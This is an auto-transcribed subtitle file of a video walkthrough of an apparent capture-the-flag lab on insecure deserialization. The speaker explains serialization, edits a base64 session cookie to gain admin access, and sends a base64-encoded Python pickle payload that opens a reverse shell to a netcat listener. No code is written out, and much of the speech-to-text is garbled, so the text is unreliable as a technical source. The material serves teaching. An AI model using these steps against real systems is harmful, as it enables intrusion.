1
00:00:00,810 --> 00:00:03,630
So there's no in this video we're going to talk about this in the clear.

2
00:00:04,920 --> 00:00:08,460
Before that, we will cover that report about the serialisation.

3
00:00:08,460 --> 00:00:15,030
And this hearing is supposed to be held to the PC.

4
00:00:19,980 --> 00:00:24,390
So this is my computer and this is the Web server.

5
00:00:26,550 --> 00:00:28,350
Let's for sure.

6
00:00:28,560 --> 00:00:30,120
And this is for database.

7
00:00:35,610 --> 00:00:36,690
So, baby.

8
00:00:39,160 --> 00:00:45,920
So sorry for drinks, so you will send so much data to this Web server is in the request, but there

9
00:00:45,970 --> 00:00:46,100
are.

10
00:00:46,540 --> 00:00:47,320
There are anyway.

11
00:00:47,440 --> 00:00:54,820
So you may send numbers one, two and characters extra.

12
00:00:56,270 --> 00:01:01,800
So sometimes he will have to send the CSB first, you have to send the video first and so much data

13
00:01:02,300 --> 00:01:06,220
so this observers can implement the serialisation.

14
00:01:06,440 --> 00:01:14,550
So this utilization is transforming any data to a single format that is like Sarposa and.

15
00:01:18,840 --> 00:01:29,190
And coding, so encoding will get the Xeroform or some other X format, so this X format will be stored

16
00:01:29,190 --> 00:01:32,460
directly in the database by the Web server.

17
00:01:33,390 --> 00:01:42,330
So this is called serialisation, changing the normal data into some by raw data or something to say

18
00:01:42,330 --> 00:01:45,420
X format by applying some algorithms, you see.

19
00:01:46,530 --> 00:01:53,010
So this is very easy because the database doesn't need to do this value and no need to worry about the

20
00:01:53,010 --> 00:01:57,270
data type and Skouras schema to store and address problems.

21
00:01:57,280 --> 00:02:00,710
So it just simply stored this Serasa data.

22
00:02:01,500 --> 00:02:06,570
So it will be very easy for transport from one database to another database.

23
00:02:06,690 --> 00:02:07,690
No need to worry about this.

24
00:02:08,040 --> 00:02:12,540
So in this database, the serialisation serializer data will be stored.

25
00:02:12,780 --> 00:02:21,350
So upon retrieval, the series of data will be decided either by the Web server.

26
00:02:22,320 --> 00:02:29,820
So it will be decelerator back to this normal format B or whatever.

27
00:02:30,450 --> 00:02:39,600
So in this matter and this matter, the decoding or whatever the operation performed here, it will

28
00:02:39,600 --> 00:02:42,000
be a reverse operation to this operation.

29
00:02:42,480 --> 00:02:45,180
So this is called decentralization.

30
00:02:45,420 --> 00:02:53,760
So transforming that Serasa data or some other raw data into the actual meaningful data is called decentralization.

31
00:02:54,870 --> 00:03:00,870
And the Web server after this transition will get the result in the computer.

32
00:03:01,560 --> 00:03:04,820
So that is the segregation and discrimination.

33
00:03:05,340 --> 00:03:11,160
Suppose if any Web server is using the programming language like Ruby, which is called martialing.

34
00:03:11,430 --> 00:03:17,680
So serialisation is Kamari and in Python is catheterization and serialisation in common.

35
00:03:18,330 --> 00:03:21,280
So suppose there is a vulnerability in programming language.

36
00:03:21,450 --> 00:03:26,830
So this encoding and every data you can send, even the reversal.

37
00:03:26,910 --> 00:03:35,060
So if you send the reversal, it will encode this and it will execute in the Sarasate upon distribution

38
00:03:35,080 --> 00:03:35,800
it will execute.

39
00:03:35,850 --> 00:03:43,920
So, uh, you can send a reversal in the encoded format so that for the theater, what this serialization

40
00:03:43,920 --> 00:03:53,790
transforming normal actual data into the uh, some C is a minor C that are X format data by applying

41
00:03:53,790 --> 00:03:57,570
some diagrams and coding and then it be stored in the database.

42
00:03:57,790 --> 00:04:03,920
So then you can retrieve those data and you can trace it back into this normal data in meaningful use

43
00:04:03,930 --> 00:04:04,860
and useful data.

44
00:04:05,670 --> 00:04:07,980
This is consideration and decentralization.

45
00:04:08,580 --> 00:04:10,950
So what is the insecure disillusionments?

46
00:04:11,100 --> 00:04:19,050
You can execute the call upon busy raising the process upon disclosing the data.

47
00:04:19,860 --> 00:04:23,880
So let's go to distract me or I start to do so.

48
00:04:23,880 --> 00:04:27,850
We have already done this crosseyed scripting room, but we do not get the answer.

49
00:04:28,320 --> 00:04:33,480
So let's focus on this insecurity situation so you can operate this theory.

50
00:04:33,810 --> 00:04:39,060
And I use the issue to read the story and tomka application.

51
00:04:40,380 --> 00:04:42,340
I think some so many.

52
00:04:42,370 --> 00:04:43,430
I said, are you OK?

53
00:04:43,950 --> 00:04:46,560
Let me just focus on the main concept.

54
00:04:47,940 --> 00:04:50,120
So it's an in object oriented programming.

55
00:04:50,140 --> 00:04:51,030
Don't worry about this.

56
00:04:51,030 --> 00:04:54,300
Will we have called in the python instead and behavior.

57
00:04:54,420 --> 00:05:03,060
So it's the state like whether it's, uh, uh, what color the properties of the object itself is casted.

58
00:05:03,240 --> 00:05:08,270
So whether the word is white color or pink color or any other color.

59
00:05:08,550 --> 00:05:14,320
So that is a state, uh, behavior means, uh, the action that is the object is.

60
00:05:15,840 --> 00:05:22,060
I can see that particular object and I can have different types of verbs, so and verbs, consumables,

61
00:05:22,230 --> 00:05:26,040
etc. So different what parts and there should be on and off.

62
00:05:26,040 --> 00:05:27,450
So that is card behavior.

63
00:05:27,450 --> 00:05:31,410
So on and off behavior and state would be the types of these verbs.

64
00:05:33,290 --> 00:05:38,900
So they have asked the same question, if Doug was sleeping, it, this would be a behavior that it

65
00:05:39,110 --> 00:05:41,080
doing some action and it is sleeping.

66
00:05:42,020 --> 00:05:45,390
So let's go through this deterioration.

67
00:05:45,740 --> 00:05:50,500
They have given a Web server and are the client.

68
00:05:50,510 --> 00:05:52,010
It is sending the password, one, two, three.

69
00:05:52,160 --> 00:06:00,080
So they are converting the sponsor into binary format so that we ask you to Benetti and they are sending

70
00:06:00,080 --> 00:06:06,980
in that database so this database can be exported into some other format and they can erase the binary

71
00:06:06,980 --> 00:06:07,400
format.

72
00:06:09,960 --> 00:06:13,730
So this is a binary, so let's answer this one.

73
00:06:17,140 --> 00:06:22,200
So let's also answer this one, make sure that we have done this our.

74
00:06:27,120 --> 00:06:28,700
So now let's go to these cookies.

75
00:06:32,930 --> 00:06:38,750
So kookiest told the station information, so you can see this one, we use cookies to ensure the best

76
00:06:38,750 --> 00:06:43,030
user experience for almost any websites like Amazon, Flipkart, etc..

77
00:06:43,340 --> 00:06:50,750
So why this is because they need to track you over behavior towards the website, whether you are using

78
00:06:50,750 --> 00:06:55,550
the electronics, whether you are using the mobiles or any other shopping materials, and they will

79
00:06:55,550 --> 00:07:02,340
keep the track in the cart and they will you some more products related to your search in their website

80
00:07:02,360 --> 00:07:04,480
so far that they will use the cookies.

81
00:07:05,630 --> 00:07:14,300
And you can see this is the typical cookie, the type of this one that is like a variable name and IP

82
00:07:14,300 --> 00:07:19,170
address and a session MJM and the value of this variable.

83
00:07:20,510 --> 00:07:23,300
So as you can see, this is the description of this cookie.

84
00:07:23,300 --> 00:07:29,060
Cookie can have a name and where this is very common because the cookie main attributes are name and

85
00:07:29,060 --> 00:07:31,490
value and they can be extra attributes.

86
00:07:31,640 --> 00:07:33,200
Security expert, but.

87
00:07:36,720 --> 00:07:45,660
And they have some given some example, and you can see that so you can get the part of the camera.

88
00:07:46,010 --> 00:07:54,300
But what they were that was the user has to use this is the same you are in block plugin.

89
00:07:54,930 --> 00:07:57,450
So let's do this kookiest practical from here on.

90
00:07:57,450 --> 00:07:57,750
What?

91
00:07:57,750 --> 00:07:59,690
We just paid some attention.

92
00:08:00,810 --> 00:08:03,360
So let's go to this website.

93
00:08:04,680 --> 00:08:08,730
And they have given some cookies and we to they are asking to change.

94
00:08:08,730 --> 00:08:12,430
It is key to to get the admin flat.

95
00:08:14,220 --> 00:08:21,750
So let me go to my car, the next machine, and let me go into this website.

96
00:08:23,920 --> 00:08:31,540
So explain your exchange to this exchange there and sign up, let's say Nicole, Nicole.

97
00:08:35,240 --> 00:08:44,180
All right, username, user and exchange ideas, click on this inspect element and don't you can see

98
00:08:44,180 --> 00:08:50,540
the storage and the storage you can see are the stored information like cookies, another attribute

99
00:08:50,540 --> 00:08:54,210
where you can see and this is better.

100
00:08:57,130 --> 00:08:59,650
I think we could be this could the.

101
00:09:02,060 --> 00:09:03,450
So let me give it a try.

102
00:09:04,790 --> 00:09:06,950
So there is a call.

103
00:09:08,230 --> 00:09:13,140
They shot this one and sent it to base64.

104
00:09:14,870 --> 00:09:15,560
By Assadi.

105
00:09:18,170 --> 00:09:21,360
So it's not a flag, sorry, father.

106
00:09:21,850 --> 00:09:33,980
It's not a flag and no type, you need to change this to a Edwin to get the advantage, but that's what

107
00:09:33,980 --> 00:09:34,600
they're seeing.

108
00:09:35,620 --> 00:09:40,930
So double click on the left are you are commonly used to modify the contents.

109
00:09:44,430 --> 00:09:46,730
Now, let me read this page.

110
00:09:48,530 --> 00:09:53,870
And you can see we have got the urban dashboard and there is this front, copy this.

111
00:09:56,360 --> 00:10:03,350
So this is the CDC data, so we can all see this now, it may be serializer on the Sarasate.

112
00:10:05,360 --> 00:10:12,200
Maybe this is not surprising this session is raising and is getting serious.

113
00:10:13,040 --> 00:10:14,840
So, I mean, that's what this one.

114
00:10:16,230 --> 00:10:19,000
And we need to give you.

115
00:10:21,280 --> 00:10:23,250
The flag is Kimberly.

116
00:10:26,900 --> 00:10:27,500
September.

117
00:10:31,050 --> 00:10:32,850
Where is this cookie, where you.

118
00:10:43,940 --> 00:10:45,900
All right, OK, let's go.

119
00:10:48,050 --> 00:10:52,430
Maybe I just want you to go to the movie where you hear.

120
00:10:54,450 --> 00:10:57,270
So let's move on to another one that is correct.

121
00:10:58,020 --> 00:11:01,510
This is very interesting one, so I need to click on this exchange.

122
00:11:01,980 --> 00:11:04,260
So let's go ahead and click on this exchange with.

123
00:11:11,490 --> 00:11:18,090
So I think we need to click on this, provide feedback, provide feedback, so click on this, provide

124
00:11:18,090 --> 00:11:18,690
your feedback.

125
00:11:18,780 --> 00:11:26,310
So asking for username and my comments that you can inject the reversal in the incorrect, because if

126
00:11:26,310 --> 00:11:29,730
you send it or whatever, it will be decoded again.

127
00:11:29,740 --> 00:11:36,000
And basically that's what we need to encode it in the bases of what and when it is, uh, it will automatically

128
00:11:36,000 --> 00:11:39,410
decode into a normal format and then articulate.

129
00:11:39,840 --> 00:11:41,940
So this is, uh, in Python.

130
00:11:42,690 --> 00:11:51,690
They are using this particular model and bigger model is used to select the data and then you get the

131
00:11:51,690 --> 00:11:58,950
picture better, then we're encoding it in the best forward and there then just setting the cookie.

132
00:11:58,980 --> 00:12:00,410
So this is the server side code.

133
00:12:01,450 --> 00:12:05,430
You can see the data and you're encoding with base64.

134
00:12:07,240 --> 00:12:13,090
And you can see this is the question that Mr. Gettelfinger apparently are asking for, and we are decoding

135
00:12:13,090 --> 00:12:18,960
this so we can print in a normal format so we can also use without Python programming.

136
00:12:20,710 --> 00:12:22,410
So they have given this code.

137
00:12:22,900 --> 00:12:27,700
So now to execute this reversal, we need to encode this in the basis of our format.

138
00:12:28,420 --> 00:12:30,200
So this is the call they had.

139
00:12:30,580 --> 00:12:31,930
Condra And.

140
00:12:35,610 --> 00:12:45,960
And copy this one and it's and put pasted in our and I rc not, but let's say the same with with the

141
00:12:45,960 --> 00:12:48,750
same name they could have.

142
00:12:48,750 --> 00:12:52,880
But we need to change this reversal.

143
00:12:54,210 --> 00:12:55,260
Uh, called.

144
00:12:57,700 --> 00:13:08,450
To this IP address to our and zero IP address, because that's where we are connected to this IP.

145
00:13:11,130 --> 00:13:12,750
So let's compare this.

146
00:13:15,140 --> 00:13:23,540
And pasted in here, let's say the fourth one, two, two, one, two, three, five, one, two, three,

147
00:13:23,540 --> 00:13:23,680
four.

148
00:13:23,720 --> 00:13:31,040
Right now, what we're going to do is we need to just let me show you this.

149
00:13:31,790 --> 00:13:35,240
So first, we are putting all the modules in the patent system.

150
00:13:35,360 --> 00:13:41,000
And this for this RCC will accept and accept the object.

151
00:13:42,050 --> 00:13:44,510
So this will execute this.

152
00:13:45,110 --> 00:13:52,980
This is a reversal and this will encode in a basic shiver and then it will be up on the Sarasate, D.C.

153
00:13:53,000 --> 00:14:03,890
release and it will unlock the data and then execute this command so that Python three are set up to

154
00:14:03,890 --> 00:14:11,780
generate this base64 type of our perrottet in the bases for format so that we copy this.

155
00:14:13,680 --> 00:14:26,130
And now we need to paint this in this and this and this one, so before that, we need to go on and

156
00:14:27,030 --> 00:14:31,110
present using this and see my niece will be one, two, three, five.

157
00:14:31,590 --> 00:14:33,690
And we are going on listening on this fourth.

158
00:14:34,140 --> 00:14:36,350
And let me read this page.

159
00:14:36,930 --> 00:14:44,270
So this probe will be sent to the server and it will decode and D.C. release and then we will get there.

160
00:14:45,300 --> 00:14:49,520
So we have successfully got the shell, we can say, and less.

161
00:14:51,060 --> 00:14:54,150
So this is after that is the flask.

162
00:14:54,540 --> 00:14:58,110
Uh, this looks like similar to Jianguo also.

163
00:14:59,700 --> 00:15:07,110
So I think we should go to the home territory home to get the flag.

164
00:15:09,560 --> 00:15:12,350
So we have successfully got this pregnant.

165
00:15:15,380 --> 00:15:18,860
A less sympathetic.

166
00:15:20,750 --> 00:15:23,850
Unless and there is our dirty H.T..

167
00:15:26,900 --> 00:15:31,830
So it is a pleasure to be here.

168
00:15:33,210 --> 00:15:35,520
So this is all this insecure.

169
00:15:36,930 --> 00:15:44,820
So in this Python application, they have this particular module, it will simply execute whatever we

170
00:15:44,820 --> 00:15:45,450
have sent.

171
00:15:45,870 --> 00:15:51,460
But we should send in a format that is the server is anchoring the service and calling the bases.

172
00:15:51,700 --> 00:15:57,980
That's why we have created this basis for encoding and we have series this command.

173
00:15:58,260 --> 00:16:01,250
So on the server side, it has decoded and DC Razib.

174
00:16:01,440 --> 00:16:03,990
And then this comment got that executer.

175
00:16:04,830 --> 00:16:06,360
So that's why we got the reverser.

176
00:16:07,140 --> 00:16:10,490
I hope you understood that server, this insecurity serialisation.

177
00:16:10,950 --> 00:16:15,090
Once you practiced this in this machine, you'll get easily understood.